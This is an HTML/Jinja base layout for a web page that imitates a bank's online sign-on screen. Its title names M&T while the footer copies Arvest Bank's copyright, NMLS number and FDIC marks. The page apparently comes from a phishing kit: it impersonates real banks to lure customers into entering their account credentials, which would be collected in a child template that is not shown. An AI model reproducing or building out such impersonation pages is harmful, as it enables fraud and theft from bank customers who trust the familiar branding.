<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <link rel="stylesheet" href="../static/css/index.css">
    
    <title>Sign On to View Your Personal Accounts | M&T</title>
</head>
<body>
    <div class="navbar">
        <div class="brand">
          <img src="../static/images/brand.png" height="30px" alt="" />
        </div>
      </div>
{% block body %}

{%endblock%}

<div class="footer">

  <p><a href="">About Arvest</a> <span class="footer-link-line">|</span> <a href="">Contact Us</a> <span class="footer-link-line">|</span> <a href="">Careers</a> <br> <a href="">Privacy & Security</a> <span class="footer-link-line">|</span> <a href="">Full Site</a> <span class="footer-link-line">|</span>   </p>
 
  
  <p>Copyright &copy; 2021 Arvest Bank. All Rights Reserved</p>
  <div class="footer-img" >
    <div>
      <img src="../static/images/equity.png" alt="" srcset="">
    </div>

    <div>
      <h3 style="color: grey;">EQUITY</h3>
    </div>
    
  </div>
  <p>Equal Housing Lender NMLS #381076 <a href="">Member FDIC</a></p>
</div>



</body>
</html>